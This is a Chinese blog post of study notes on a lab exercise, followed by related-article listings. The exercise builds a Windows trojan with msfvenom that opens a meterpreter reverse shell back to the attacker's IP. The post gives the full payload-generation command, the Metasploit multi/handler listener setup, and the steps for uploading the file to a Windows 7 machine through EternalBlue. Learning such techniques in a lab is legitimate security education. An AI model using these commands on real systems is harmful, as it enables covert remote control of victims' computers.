网络安全Day02笔记

最新推荐文章于 2024-09-14 13:45:00 发布
最新推荐文章于 2024-09-14 13:45:00 发布
阅读量51 收藏
点赞数
文章标签: web安全 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/isolaterxu/article/details/133848399
版权

PC端恶意程序利用

制作WIndows恶意软件获取shell

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品,是用来生成后门的软件

实验内容

制作Win恶意软件
msfvenom的shell在windows中的使用msfvenom生成shell.exe
前置命令 切换到root用户,确保权限最大
sudo passwd root
su root

步骤一:制作并且输出恶意软件

命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.129(攻击机的IP)
LPORT=6060 -f exe >allen.exe(名字自己取)

-p 添加载荷payload。
-f 输出文件格式
在这里插入图片描述

步骤2

启动msf
msfconsole
在这里插入图片描述

步骤3

metasploit设置侦听
use exploit/multi/handler #加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
#设置payload
msf exploit(multi/handler) > set lhost kali的ip #设置kali的IP
msf exploit(multi/handler) > set lport 6060 #设置kali的端口lport =6060
msf exploit (multi/handler) > exploit 或者 run -j #执行

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

接着把木马文件上传到win7

可以用永恒之蓝漏洞上传到win7(步骤见day01)
命令:
upload allen.exe c://

在这里插入图片描述

点击win7的allen程序
在这里插入图片描述

ps 查看端口
在这里插入图片描述

可能问题

meterpreter died
原因攻击载荷不对
在这里插入图片描述

最后打开win7任务管理器查看allen.exe程序,已经存在了
在这里插入图片描述

注:本文内容仅为个人技术实验分享,请谨记国家安全法。

isolater-徐熠明
关注
网络安全day01
Paranoid_truggle的博客
10-09 2071
ip地址的构成是网络位加主机位,网络位相同的IP地址才能为同一网段 ipconfig 查看IP地址的基本信息 ipconfig /all 查看IP地址的所有信息 nslookup www.baidu.com 手工解析域名的IP地址 ping命令详解 ping 10.1.1.2 可以测试延迟 ping www.baidu.com -t :Ping 指定的计算机直到中断。 -a :将地址解析为计算机名。 -n count :发送 count 指定的 ECHO 数据包数。默认值为 4。 -l size :发送包含
网络安全学习笔记(2)
qq_40316844的博客
08-23 1248
Wireshark的使用 这篇文章在于使用Wireshark,同样下载和安装方面就不再赘述,具体的方法自行百度,总体安装较为成功,并未出现任何问题。打开Wirshark: 首先选择需要监听的网卡,可以选择自己现在正在上网的网卡,选择后开始抓包,接下来最重要的就是过滤:这里介绍了一些基础的使用方法 过滤源ip、目的ip 在wireshark的过滤规则框Filter中输入过滤条件。如查找目的地址为19...
网络安全学习笔记Day1
Leo__ch的博客
01-07 626
第一节 Leo:网络并非法外之地。网络安全需要你我维护,切不可触碰非法领域。 域名 什么是域名? 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)。 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器
网络安全笔记(Day4)
gentle、待人的博客
05-31 2030
目标: 1.NTFS安全权限 2.文件共享服务器
网络安全笔记-day6,NTFS安全权限
欢迎大家,一起努力!
03-21 1844
文件权限权限内容完全控制读取,写入,修改,删除,特殊文件修改读取,写入,修改,删除读取和执行读取,执行,下载读取读取写入写入特殊权限控制文件权限文件夹权限权限内容完全控制读取,写入,修改,删除,特殊文件修改读取,写入,修改,删除读取和执行读取,执行,下载读取读取写入写入特殊权限控制文件权限大概就是这样当用户属于不同组是,权限是可以累加的,当允许碰到拒绝,拒绝优先级最高!
网络安全工程师(千峰教育)笔记
11-03
b站的千峰老师的网络安全工程师的系列课程的笔记,自己整理的,pdf版本,内容包含day2--------day24。
【千峰】网络安全学习笔记
chenjyboke的博客
12-03 1261
一OSI TCP,IP协议簇 1.分层模型 (同层使用相同的协议, 下层为上层提供服务) 通信需求---->定义协议标准 含义:将复杂的流程分解为几个功能相对单一的过程 目的:1.整个流程更加清晰,将复杂化的问题简单化。 2.更容易发现问题并针对性的解决问题。 (1)分层思想 (2)OSL参考模型 (3)TCP/IP协议簇 应用层 传输层 网络层 数据链接层 物理层 2. 数据传输过程 数据封装与解封装过程 ...
网络安全学习笔记--Day1 TCP/IP协议:(千峰网络安全视频笔记
CongM_JueD的博客
08-27 1609
TCP/IP协议
网络安全学习笔记--Day1 物理层和数据链路层:(千峰网络安全视频笔记
CongM_JueD的博客
08-27 1320
物理层和数据链路层的设备及其他内容。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2282
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1935
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 667
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 817
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 944
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1532
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
Web安全网络安全:SQL漏洞注入
hong161688的博客
09-10 799
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-08 1678
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全-dom破坏结合jq漏洞以及框架漏洞造成的xss-World War 3
m0_68976043的博客
09-10 852
如果notify为真的话那么html是代码解析meme-code的值在页面随便输入一个text=aaaa&img=bbbbb很明显调用到这里因为text和img都存在了而我们可以很明显看到一点Meme Code没值,没值的话那就代表onload根本没有加载,当我们什么都没写的情况下很明显加载值了当我们把地址参数写对的情况下,我们的onload很明显是可以执行的而我们从始至终都没有看到created...,因为notify是false1.绕过过滤框架2.html 逃逸出style标签。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

isolater-徐熠明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值